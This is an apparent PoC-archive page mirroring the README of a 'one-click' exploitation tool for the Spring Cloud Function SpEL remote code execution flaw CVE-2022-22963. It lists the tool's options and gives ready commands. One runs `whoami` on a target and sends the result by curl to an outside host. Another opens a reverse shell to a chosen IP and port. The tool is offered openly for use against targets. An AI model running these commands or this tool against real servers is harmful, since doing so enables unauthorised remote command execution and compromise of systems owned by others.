Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-22963 PoC — Spring Framework 代码注入漏洞

Source
Associated Vulnerability
Title:Spring Framework 代码注入漏洞 (CVE-2022-22963)
Description:In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.
Description
spring cloud function 一键利用工具! by charis 博客https://charis3306.top/
Readme
# CVE-2022-22963 (spring cloud function sple rce)
### spring cloud function 一键利用工具! by charis 
#### 博客https://charis3306.top/
##### 已打包为exe文件开箱即用
#### 命令主题
```
usage: Spring-cloud-function-spel0.2.exe [-h] --check CHECK [--route ROUTE] --url URL [--ip IP] [--port PORT] [--proxies PROXIES] [--cmd CMD]

spring cloud function 一键利用工具! by charis 博客https://charis3306.top/

options:
  -h, --help         show this help message and exit
  --check CHECK      检测方式post或get方式,--check get --check post
  --route ROUTE      检测路由,默认是functionRouter
  --url URL          输入利用的url
  --ip IP            反弹shell地址ip
  --port PORT        反弹shell地址端口
  --proxies PROXIES  启用代理
  --cmd CMD          要执行的命令

```

--check 是必选项

#### 所用帮助主题

```
Spring-cloud-function-spel0.2.exe --help
```
![image](https://github.com/charis3306/CVE-2022-22963/blob/main/1.png)

> 默认检测--check 是必须选,--route是漏洞存在的路由。
注意如果不借助dnslog 或sleep 进行探测会存有误报!
```
Spring-cloud-function-spel0.2.exe --check post --url http://www.charis3306.top
```
![image](https://github.com/charis3306/CVE-2022-22963/blob/main/2.png)

##### 执行命令验证是否能利用
```
Spring-cloud-function-spel.exe --check post --url http://192.168.133.136:8080/ --cmd "curl http://192.168.1.3:8080/`whoami`"
```
![image](https://github.com/charis3306/CVE-2022-22963/blob/main/3.png)

##### 反弹shell

```
Spring-cloud-function-spel.exe --check post --url http://192.168.133.136:8080/ --ip 192.168.1.3 --port 9999
```

![image](https://github.com/charis3306/CVE-2022-22963/blob/main/4.png)


#### 如果你觉得还不错请给我一个star
#### 问题反馈lssues 或邮箱联系我charis3306@outlook.com




File Snapshot

[4.0K] /data/pocs/f5ba8dc7fdff14946ed60c22c44ac595156af49f ├── [ 55K] 1.png ├── [ 35K] 2.png ├── [117K] 3.png ├── [ 78K] 4.png ├── [1.8K] README.md ├── [5.2K] Spring-cloud-function-spel.py └── [6.4K] spring.ico 0 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →